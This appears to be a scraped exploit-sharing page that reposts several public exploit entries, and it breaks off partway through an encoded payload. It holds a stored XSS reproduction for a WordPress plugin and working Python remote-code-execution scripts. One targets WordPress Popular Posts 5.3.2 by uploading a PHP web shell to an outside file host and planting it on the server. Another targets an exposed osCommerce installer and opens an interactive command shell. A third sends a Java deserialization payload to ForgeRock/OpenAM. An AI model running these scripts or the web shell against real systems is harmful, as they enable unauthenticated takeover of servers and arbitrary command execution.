    # Exploit Title: WordPress Plugin Current Book 1.0.1 - 'Book Title and Author field' Stored Cross-Site Scripting (XSS) # Date: 14/07/2021 # Exploit Author: Vikas Srivastava # Vendor Homepage: # Software Link: https://wordpress.org/plugins/current-book/ # Version: 1.0.1 # Category: Web Application How to Reproduce this Vulnerability: 1. Install WordPress 5.7.2 2. Install and activate Custom Book 3. Navigate to Tools >> Current Book and enter the XSS payload into the Book and Author input field. 4. Click Update Options 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.
  15. HireHackking

    WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated) # Date: 15/07/2021 # Exploit Author: Simone Cristofaro # Vendor Homepage: https://it.wordpress.org/plugins/wordpress-popular-posts/ # Software Link: https://downloads.wordpress.org/plugin/wordpress-popular-posts.5.3.2.zip # Version: 5.3.2 or below # Tested on: Debian 10, WordPress 5.7.2, PHP version 7.3.27 # CVE: CVE-2021-42362 # Reference: https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/ # Notes: It's required that the Popular Posts widget is active (ie. in the footer section) and gd extension for PHP is # enabled (otherwise WPP can't generate thumbnails). Also, the authenticated user must have "Contributor" role or above. # This script will login with the provided credentials, create a new post and add a custom field with the link to a # web shell, that will be automatically downloaded by the server. If you don't want to upload the file, you need to # provide a URL to a web shell with SSL support (https) and make sure it contains the file name in it. If the plugin is # set to show a fixed number of popular posts (ie. top 5), you just need to refresh the post page to make it go up ;) ''' Banner: ''' banner = """ * Wordpress Popular Posts plugin <= 5.3.2 - RCE (Authenticated) * @Heisenberg """ print(banner) ''' Import required modules: ''' import requests import argparse import json import re ''' User-Input: ''' my_parser = argparse.ArgumentParser(description='Wordpress Popular Posts plugin <= 5.3.2 - RCE (Authenticated)') my_parser.add_argument('-t', help='--Target IP', metavar='IP', type=str, required=True, dest="target_ip") my_parser.add_argument('-p', help='--Target port', type=str, metavar='PORT', default='80', dest="target_port") my_parser.add_argument('-w', help='--Wordpress path (ie. /wordpress/)',metavar='PATH', type=str, required=True, dest="wp_path") my_parser.add_argument('-U', help='--Username', metavar='USER', type=str, required=True, dest="username") my_parser.add_argument('-P', help='--Password', metavar='PASS', type=str, required=True, dest="password") args = my_parser.parse_args() target_ip = args.target_ip target_port = args.target_port wp_path = args.wp_path username = args.username password = args.password ''' # Hard coded parameters (if you don't like command line execution) target_ip = "localhost" target_port = "80" wp_path = "/wordpress/" username = "heisenberg" password = "heisenberg" ''' shell_name = 'exploit.gif.php' payload = 'GIF <html> <body> <form method="GET" name="<?php echo basename($_SERVER[\'PHP_SELF\']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET[\'cmd\'])) { system($_GET[\'cmd\']); } ?> </pre> </body> </html>' print('') print('[*] Starting Exploit:') ''' Upload file ''' file_json = requests.post('https://api.bayfiles.com/upload', files={ 'file' : (shell_name, payload)}) resp = json.loads(file_json.text) if resp['status']: urlshort = resp['data']['file']['url']['full'] else: print(f'[-] Error:'+ resp['error']['message']) exit() file_uploaded_site = requests.get(urlshort).text PHP_URL = re.findall(r"(https?://\S+)("+shell_name+")",file_uploaded_site)[0][0] + shell_name print(f'[+] Web Shell successfully uploadad at [{PHP_URL}].') ''' Authentication: ''' session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' # Header: header = { 'Host': target_ip, 'User-Agent': 'Monies Browser 1.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Upgrade-Insecure-Requests': '1' } # Body: body = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1' } # Authenticate: auth = session.post(auth_url, headers=header, data=body) auth_header = auth.headers['Set-Cookie'] if 'wordpress_logged_in' in auth_header: print(f'[+] Authentication successfull as user [{username}] !') else: print('[-] Authentication failed ! Check username and password') exit() ''' Verify that the requirements are installed ''' settings_page_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/options-general.php?page=wordpress-popular-posts&tab=debug' settings_page = session.get(settings_page_url).text search_string = ' gd' if settings_page.find(search_string) == -1 : print('[-] Error, gd extension for PHP is not installed/enabled on the server ! WPP can\'t generate thumbnails.') exit() ''' Get the wpp-admin-token ''' settings_page_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/options-general.php?page=wordpress-popular-posts&tab=tools' settings_page = session.get(settings_page_url).text search_string = '<input type="hidden" id="wpp-admin-token" name="wpp-admin-token" value="' search_string_end = '" />' settings_page = settings_page[settings_page.find(search_string):] wpp_admin_token = settings_page[72: settings_page.find(search_string_end)] if wpp_admin_token: print(f'[+] Acquired wpp-admin-token [{wpp_admin_token}].') else: print('[-] Error while gathering wpp-admin-token !') exit() ''' Apply changes to the Popular Posts plugin ''' body = { 'upload_thumb_src': '', 'thumb_source': 'custom_field', 'thumb_lazy_load': 1, 'thumb_field': 'wpp_thumbnail', 'thumb_field_resize': 1, 'section': 'thumb', 'wpp-admin-token': wpp_admin_token } applied_changes = session.post(settings_page_url, headers=header, data=body).text if applied_changes.find('<div class="notice notice-success is-dismissible"><p><strong>Settings saved.'): print(f'[+] Settings applied successfully to the Popular Posts plugin. ') else: print('[-] Error while applying settings o the Popular Posts plugin!') exit() ''' Empty image cache ''' body = { 'action': 'wpp_clear_thumbnail', 'wpp-admin-token': wpp_admin_token } applied_changes = session.post(settings_page_url, headers=header, data=body).text print(f'[+] Images cache cleared. ') ''' Get the new post ID and Nonce ''' new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/post-new.php' new_post_page = session.get(new_post_url).text search_string = 'name="_ajax_nonce-add-meta" value="' search_string_end = '" />' new_post_page = new_post_page[new_post_page.find(search_string)+35:] ajax_nonce = new_post_page[:new_post_page.find(search_string_end)] search_string = 'wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware( "' search_string_end = '" );' new_post_page = new_post_page[new_post_page.find(search_string)+66:] wp_nonce = new_post_page[:new_post_page.find(search_string_end)] search_string = '},"post":{"id":' search_string_end = ',' new_post_page = new_post_page[new_post_page.find(search_string)+15:] post_ID = new_post_page[:new_post_page.find(search_string_end)] if post_ID and wp_nonce and ajax_nonce: print(f'[+] Acquired new post ID [{post_ID}], WP Nonce [{wp_nonce}] and AJAX Nonce [{ajax_nonce}].') else: if not post_ID: print('[-] Error while gathering post_ID !') elif not wp_nonce: print('[-] Error while gathering Wordpress Nonce !') elif not ajax_nonce : print('[-] Error while gathering Wordpress AJAX Nonce !') exit() ''' Publish a new post ''' new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'index.php/wp-json/wp/v2/posts/'+post_ID+'?_locale=user' data = {"id":post_ID,"title":"I'm the one who knocks","content":"<!-- wp:paragraph -->\n<p>upgrade your plugins</p>\n<!-- /wp:paragraph -->","status":"publish"} header['X-WP-Nonce'] = wp_nonce header['Content-Type'] = 'application/json' header['X-HTTP-Method-Override'] = 'PUT' new_post_page = session.post(new_post_url, headers=header, json=data).text if new_post_page.find('"status":"publish"'): print(f'[+] New post named [I\'m the one who knocks] published correctly!') else: print('[-] Error while publishing the new post !') exit() ''' Add the Custom Filed ''' new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php' header.pop('X-WP-Nonce') header['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8' header.pop('X-HTTP-Method-Override') header['Accept']='*/*' header['X-Requested-With'] = 'XMLHttpRequest' body = { '_ajax_nonce': 0, 'action': 'add-meta', 'metakeyselect': 'wpp_thumbnail', 'metakeyinput': "", 'metavalue' : PHP_URL, '_ajax_nonce-add-meta': ajax_nonce, 'post_id' : post_ID } new_post_page = session.post(new_post_url, headers=header, data=body).text if new_post_page.find("<tr id='meta-") > 0: print(f'[+] Added a new Custom Field with the uploaded web shell.') else: print('[-] Error while adding the custom field !') print(new_post_page) exit() ''' Give it some views to pop it up in the recent posts ''' print(f'[+] Giving the new post some views (10) [ ', end="") new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'index.php?page_id=' + post_ID redirect_url = session.get(new_post_url).url new_post_plugin_url = 'http://' + target_ip + ':' + target_port + wp_path + 'index.php/wp-json/wordpress-popular-posts/v1/popular-posts' data = { '_wpnonce': wp_nonce, 'wpp_id': post_ID, 'sampling': 0, 'sampling_rate': 100 } for progress in range(10): session.get(redirect_url) res = session.post(new_post_plugin_url, headers=header, data=data) print ('=', end='') print(' ] '+json.loads(res.text)['results']) print('[+] Exploit done !') print(' -> Webshell: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/wordpress-popular-posts/' + post_ID +'_'+ shell_name) print('')
  16. HireHackking

    osCommerce 2.3.4.1 - Remote Code Execution (2)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: osCommerce 2.3.4.1 - Remote Code Execution (2) # Vulnerability: Remote Command Execution when /install directory wasn't removed by the admin # Exploit: Exploiting the install.php finish process by injecting php payload into the db_database parameter & read the system command output from configure.php # Notes: The RCE doesn't need to be authenticated # Date: 26/06/2021 # Exploit Author: Bryan Leong <NobodyAtall> # Vendor Homepage: https://www.oscommerce.com/ # Version: osCommerce 2.3.4 # Tested on: Windows import requests import sys if(len(sys.argv) != 2): print("please specify the osCommerce url") print("format: python3 osCommerce2_3_4RCE.py <url>") print("eg: python3 osCommerce2_3_4RCE.py http://localhost/oscommerce-2.3.4/catalog") sys.exit(0) baseUrl = sys.argv[1] testVulnUrl = baseUrl + '/install/install.php' def rce(command): #targeting the finish step which is step 4 targetUrl = baseUrl + '/install/install.php?step=4' payload = "');" payload += "passthru('" + command + "');" # injecting system command here payload += "/*" #injecting parameter data = { 'DIR_FS_DOCUMENT_ROOT': './', 'DB_DATABASE' : payload } response = requests.post(targetUrl, data=data) if(response.status_code == 200): #print('[*] Successfully injected payload to config file') readCMDUrl = baseUrl + '/install/includes/configure.php' cmd = requests.get(readCMDUrl) commandRsl = cmd.text.split('\n') if(cmd.status_code == 200): #print('[*] System Command Execution Completed') #removing the error message above for i in range(2, len(commandRsl)): print(commandRsl[i]) else: return '[!] Configure.php not found' else: return '[!] Fail to inject payload' #testing vulnerability accessing the directory test = requests.get(testVulnUrl) #checking the install directory still exist or able to access or not if(test.status_code == 200): print('[*] Install directory still available, the host likely vulnerable to the exploit.') #testing system command injection print('[*] Testing injecting system command to test vulnerability') cmd = 'whoami' print('User: ', end='') err = rce(cmd) if(err != None): print(err) sys.exit(0) while(True): cmd = input('RCE_SHELL$ ') err = rce(cmd) if(err != None): print(err) sys.exit(0) else: print('[!] Install directory not found, the host is not vulnerable') sys.exit(0)
  17. HireHackking

    ForgeRock Access Manager 14.6.3 - Remote Code Execution (RCE) (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ForgeRock Access Manager/OpenAM 14.6.3 - Remote Code Execution (RCE) (Unauthenticated) # Date: 2021-07-14 # Exploit Author: Photubias – tijl[dot]deneut[at]Howest[dot]be for www.ic4.be # Vendor Advisory: [1] https://backstage.forgerock.com/knowledge/kb/article/a47894244 # Vendor Homepage: https://github.com/OpenIdentityPlatform/OpenAM/ # Version: [1] OpenAM 14.6.3 # [2] Forgerock 6.0.0.x and all versions of 6.5, up to and including 6.5.3, and is fixed as of version AM 7 released on June 29, 2021 # Tested on: OpenAM 14.6.3 and Tomcat/8.5.68 with JDK-8u292 on Debian 10 # CVE: CVE-2021-35464 #!/usr/bin/env python3 ''' Copyright 2021 Photubias(c) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. File name CVE-2021-35464.py written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be This is a native implementation without requirements, written in Python 3. Works equally well on Windows as Linux (as MacOS, probably ;-) Rewritten from and full credits to @Y4er_ChaBug: https://github.com/Y4er/openam-CVE-2021-35464 and of course the discoverer @artsploit: https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464 Created using https://github.com/frohoff/ysoserial ''' import urllib.request, urllib.parse, ssl, sys, optparse ## Static vars; change at will, but recommend leaving as is sURL = 'http://192.168.0.100:7080/openam' sEndpoint = 'ccversion/Version' sEndpoint = 'oauth2/..;/ccversion/Version' ## This bypasses potential WAFs iTimeout = 5 strSerializedPayload = b'AKztAAVzcgAXamF2YS51dGlsLlByaW9yaXR5UXVldWWU2jC0-z-CsQMAAkkABHNpemVMAApjb21wYXJhdG9ydAAWTGphdmEvdXRpbC9Db21wYXJhdG9yO3hwAAAAAnNyADBvcmcuYXBhY2hlLmNsaWNrLmNvbnRyb2wuQ29sdW1uJENvbHVtbkNvbXBhcmF0b3IAAAAAAAAAAQIAAkkADWFzY2VuZGluZ1NvcnRMAAZjb2x1bW50ACFMb3JnL2FwYWNoZS9jbGljay9jb250cm9sL0NvbHVtbjt4cAAAAAFzcgAfb3JnLmFwYWNoZS5jbGljay5jb250cm9sLkNvbHVtbgAAAAAAAAABAgATWgAIYXV0b2xpbmtaAAplc2NhcGVIdG1sSQAJbWF4TGVuZ3RoTAAKYXR0cmlidXRlc3QAD0xqYXZhL3V0aWwvTWFwO0wACmNvbXBhcmF0b3JxAH4AAUwACWRhdGFDbGFzc3QAEkxqYXZhL2xhbmcvU3RyaW5nO0wACmRhdGFTdHlsZXNxAH4AB0wACWRlY29yYXRvcnQAJExvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvRGVjb3JhdG9yO0wABmZvcm1hdHEAfgAITAALaGVhZGVyQ2xhc3NxAH4ACEwADGhlYWRlclN0eWxlc3EAfgAHTAALaGVhZGVyVGl0bGVxAH4ACEwADW1lc3NhZ2VGb3JtYXR0ABlMamF2YS90ZXh0L01lc3NhZ2VGb3JtYXQ7TAAEbmFtZXEAfgAITAAIcmVuZGVySWR0ABNMamF2YS9sYW5nL0Jvb2xlYW47TAAIc29ydGFibGVxAH4AC0wABXRhYmxldAAgTG9yZy9hcGFjaGUvY2xpY2svY29udHJvbC9UYWJsZTtMAA10aXRsZVByb3BlcnR5cQB-AAhMAAV3aWR0aHEAfgAIeHAAAQAAAABwcHBwcHBwcHBwdAAQb3V0cHV0UHJvcGVydGllc3Bwc3IAHm9yZy5hcGFjaGUuY2xpY2suY29udHJvbC5UYWJsZQAAAAAAAAABAgAXSQAOYmFubmVyUG9zaXRpb25aAAlob3ZlclJvd3NaABdudWxsaWZ5Um93TGlzdE9uRGVzdHJveUkACnBhZ2VOdW1iZXJJAAhwYWdlU2l6ZUkAE3BhZ2luYXRvckF0dGFjaG1lbnRaAAhyZW5kZXJJZEkACHJvd0NvdW50WgAKc2hvd0Jhbm5lcloACHNvcnRhYmxlWgAGc29ydGVkWgAPc29ydGVkQXNjZW5kaW5nTAAHY2FwdGlvbnEAfgAITAAKY29sdW1uTGlzdHQAEExqYXZhL3V0aWwvTGlzdDtMAAdjb2x1bW5zcQB-AAdMAAtjb250cm9sTGlua3QAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvQWN0aW9uTGluaztMAAtjb250cm9sTGlzdHEAfgAQTAAMZGF0YVByb3ZpZGVydAAsTG9yZy9hcGFjaGUvY2xpY2svZGF0YXByb3ZpZGVyL0RhdGFQcm92aWRlcjtMAAZoZWlnaHRxAH4ACEwACXBhZ2luYXRvcnQAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvUmVuZGVyYWJsZTtMAAdyb3dMaXN0cQB-ABBMAAxzb3J0ZWRDb2x1bW5xAH4ACEwABXdpZHRocQB-AAh4cgAob3JnLmFwYWNoZS5jbGljay5jb250cm9sLkFic3RyYWN0Q29udHJvbAAAAAAAAAABAgAJTAAOYWN0aW9uTGlzdGVuZXJ0ACFMb3JnL2FwYWNoZS9jbGljay9BY3Rpb25MaXN0ZW5lcjtMAAphdHRyaWJ1dGVzcQB-AAdMAAliZWhhdmlvcnN0AA9MamF2YS91dGlsL1NldDtMAAxoZWFkRWxlbWVudHNxAH4AEEwACGxpc3RlbmVydAASTGphdmEvbGFuZy9PYmplY3Q7TAAObGlzdGVuZXJNZXRob2RxAH4ACEwABG5hbWVxAH4ACEwABnBhcmVudHEAfgAXTAAGc3R5bGVzcQB-AAd4cHBwcHBwcHBwcAAAAAIAAQAAAAAAAAAAAAAAAQAAAAAAAAAAAXBzcgATamF2YS51dGlsLkFycmF5TGlzdHiB0h2Zx2GdAwABSQAEc2l6ZXhwAAAAAHcEAAAAAHhzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHhwcHBwcHBwcHBwdwQAAAADc3IAOmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwJV0_BbqyrMwMABkkADV9pbmRlbnROdW1iZXJJAA5fdHJhbnNsZXRJbmRleFsACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXEAfgAITAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAA_____3VyAANbW0JL_RkVZ2fbNwIAAHhwAAAAAnVyAAJbQqzzF_gGCFTgAgAAeHAAABRfyv66vgAAADQBBgoARgCKCgCLAIwKAIsAjQoAHQCOCAB7CgAbAI8KAJAAkQoAkACSBwB8CgCLAJMIAJQKACAAlQgAlggAlwcAmAgAmQgAWQcAmgoAGwCbCACcCABxBwCdCwAWAJ4LABYAnwgAaAgAoAcAoQoAGwCiBwCjCgCkAKUIAKYHAKcIAKgKACAAqQgAqgkAJQCrBwCsCgAlAK0IAK4KAK8AsAoAIACxCACyCACzCAC0CAC1CAC2BwC3BwC4CgAwALkKADAAugoAuwC8CgAvAL0IAL4KAC8AvwoALwDACgAgAMEIAMIKABsAwwoAGwDECADFBwBlCgAbAMYIAMcHAMgIAMkIAMoHAMsKAEMAzAcAzQcAzgEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAlTHlzb3NlcmlhbC9wYXlsb2Fkcy9Ub21jYXRFY2hvSW5qZWN0OwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwDPAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAg8Y2xpbml0PgEAAWUBACBMamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uOwEAA2NscwEAEUxqYXZhL2xhbmcvQ2xhc3M7AQAEdmFyNQEAIUxqYXZhL2xhbmcvTm9TdWNoTWV0aG9kRXhjZXB0aW9uOwEABGNtZHMBABNbTGphdmEvbGFuZy9TdHJpbmc7AQAGcmVzdWx0AQACW0IBAAlwcm9jZXNzb3IBABJMamF2YS9sYW5nL09iamVjdDsBAANyZXEBAARyZXNwAQABagEAAUkBAAF0AQASTGphdmEvbGFuZy9UaHJlYWQ7AQADc3RyAQASTGphdmEvbGFuZy9TdHJpbmc7AQADb2JqAQAKcHJvY2Vzc29ycwEAEExqYXZhL3V0aWwvTGlzdDsBABVMamF2YS9sYW5nL0V4Y2VwdGlvbjsBAAFpAQAEZmxhZwEAAVoBAAVncm91cAEAF0xqYXZhL2xhbmcvVGhyZWFkR3JvdXA7AQABZgEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAAd0aHJlYWRzAQATW0xqYXZhL2xhbmcvVGhyZWFkOwEADVN0YWNrTWFwVGFibGUHANAHANEHANIHAKcHAKMHAJoHAJ0HAGMHAMgHAMsBAApTb3VyY2VGaWxlAQAVVG9tY2F0RWNob0luamVjdC5qYXZhDABHAEgHANIMANMA1AwA1QDWDADXANgMANkA2gcA0QwA2wDcDADdAN4MAN8A4AEABGV4ZWMMAOEA4gEABGh0dHABAAZ0YXJnZXQBABJqYXZhL2xhbmcvUnVubmFibGUBAAZ0aGlzJDABAB5qYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb24MAOMA2AEABmdsb2JhbAEADmphdmEvdXRpbC9MaXN0DADkAOUMAN0A5gEAC2dldFJlc3BvbnNlAQAPamF2YS9sYW5nL0NsYXNzDADnAOgBABBqYXZhL2xhbmcvT2JqZWN0BwDpDADqAOsBAAlnZXRIZWFkZXIBABBqYXZhL2xhbmcvU3RyaW5nAQADY21kDADsAO0BAAlzZXRTdGF0dXMMAO4AXwEAEWphdmEvbGFuZy9JbnRlZ2VyDABHAO8BAAdvcy5uYW1lBwDwDADxAPIMAPMA4AEABndpbmRvdwEAB2NtZC5leGUBAAIvYwEABy9iaW4vc2gBAAItYwEAEWphdmEvdXRpbC9TY2FubmVyAQAYamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyDABHAPQMAPUA9gcA9wwA-AD5DABHAPoBAAJcQQwA-wD8DAD9AOAMAP4A_wEAJG9yZy5hcGFjaGUudG9tY2F0LnV0aWwuYnVmLkJ5dGVDaHVuawwBAAEBDAECAQMBAAhzZXRCeXRlcwwBBADoAQAHZG9Xcml0ZQEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24BABNqYXZhLm5pby5CeXRlQnVmZmVyAQAEd3JhcAEAE2phdmEvbGFuZy9FeGNlcHRpb24MAQUASAEAI3lzb3NlcmlhbC9wYXlsb2Fkcy9Ub21jYXRFY2hvSW5qZWN0AQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAFWphdmEvbGFuZy9UaHJlYWRHcm91cAEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQAQamF2YS9sYW5nL1RocmVhZAEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwEADmdldFRocmVhZEdyb3VwAQAZKClMamF2YS9sYW5nL1RocmVhZEdyb3VwOwEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwEAEGdldERlY2xhcmVkRmllbGQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAHZ2V0TmFtZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBAA1nZXRTdXBlcmNsYXNzAQAEc2l6ZQEAAygpSQEAFShJKUxqYXZhL2xhbmcvT2JqZWN0OwEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAdpc0VtcHR5AQADKClaAQAEVFlQRQEABChJKVYBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVydHkBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAC3RvTG93ZXJDYXNlAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABXN0YXJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7AQAEbmV4dAEACGdldEJ5dGVzAQAEKClbQgEAB2Zvck5hbWUBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQALbmV3SW5zdGFuY2UBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEAEWdldERlY2xhcmVkTWV0aG9kAQAPcHJpbnRTdGFja1RyYWNlACEARQBGAAAAAAAEAAEARwBIAAEASQAAAC8AAQABAAAABSq3AAGxAAAAAgBKAAAABgABAAAAEQBLAAAADAABAAAABQBMAE0AAAABAE4ATwACAEkAAAA_AAAAAwAAAAGxAAAAAgBKAAAABgABAAAAYABLAAAAIAADAAAAAQBMAE0AAAAAAAEAUABRAAEAAAABAFIAUwACAFQAAAAEAAEAVQABAE4AVgACAEkAAABJAAAABAAAAAGxAAAAAgBKAAAABgABAAAAZgBLAAAAKgAEAAAAAQBMAE0AAAAAAAEAUABRAAEAAAABAFcAWAACAAAAAQBZAFoAAwBUAAAABAABAFUACABbAEgAAQBJAAAF7QAIABEAAAMDAzu4AAK2AANMAU0rtgAEEgW2AAZNLAS2AAcsK7YACMAACcAACU4DNgQVBC2-ogLNLRUEMjoFGQXHAAanArkZBbYACjoGGQYSC7YADJoADRkGEg22AAyaAAanApsZBbYABBIOtgAGTSwEtgAHLBkFtgAIOgcZB8EAD5oABqcCeBkHtgAEEhC2AAZNLAS2AAcsGQe2AAg6BxkHtgAEEhG2AAZNpwAWOggZB7YABLYAE7YAExIRtgAGTSwEtgAHLBkHtgAIOgcZB7YABLYAExIUtgAGTacAEDoIGQe2AAQSFLYABk0sBLYABywZB7YACDoHGQe2AAQSFbYABk0sBLYABywZB7YACMAAFsAAFjoIAzYJFQkZCLkAFwEAogHLGQgVCbkAGAIAOgoZCrYABBIZtgAGTSwEtgAHLBkKtgAIOgsZC7YABBIaA70AG7YAHBkLA70AHbYAHjoMGQu2AAQSHwS9ABtZAxIgU7YAHBkLBL0AHVkDEiFTtgAewAAgOgYZBsYBVxkGtgAimgFPGQy2AAQSIwS9ABtZA7IAJFO2ABwZDAS9AB1ZA7sAJVkRAMi3ACZTtgAeVxInuAAotgApEiq2AAyZABkGvQAgWQMSK1NZBBIsU1kFGQZTpwAWBr0AIFkDEi1TWQQSLlNZBRkGUzoNuwAvWbsAMFkZDbcAMbYAMrYAM7cANBI1tgA2tgA3tgA4Og4SObgAOjoPGQ-2ADs6BxkPEjwGvQAbWQMSPVNZBLIAJFNZBbIAJFO2AD4ZBwa9AB1ZAxkOU1kEuwAlWQO3ACZTWQW7ACVZGQ6-twAmU7YAHlcZDLYABBI_BL0AG1kDGQ9TtgAcGQwEvQAdWQMZB1O2AB5XpwBOOg8SQbgAOjoQGRASQgS9ABtZAxI9U7YAPhkQBL0AHVkDGQ5TtgAeOgcZDLYABBI_BL0AG1kDGRBTtgAcGQwEvQAdWQMZB1O2AB5XBDsamQAGpwAJhAkBp_4vGpkABqcAEacACDoFpwADhAQBp_0ypwAISyq2AESxAAgAlwCiAKUAEgDFANMA1gASAhUCiAKLAEAAMAA7Au8AQwA-AFkC7wBDAFwAfALvAEMAfwLpAu8AQwAAAvoC_QBDAAMASgAAAQYAQQAAABUAAgAWAAkAFwALABgAFQAaABoAGwAmABwAMAAeADYAHwA-ACAARQAhAFwAIgBnACMAbAAkAHQAJQB_ACYAigAnAI8AKACXACoAogAtAKUAKwCnACwAuAAuAL0ALwDFADEA0wA0ANYAMgDYADMA4wA1A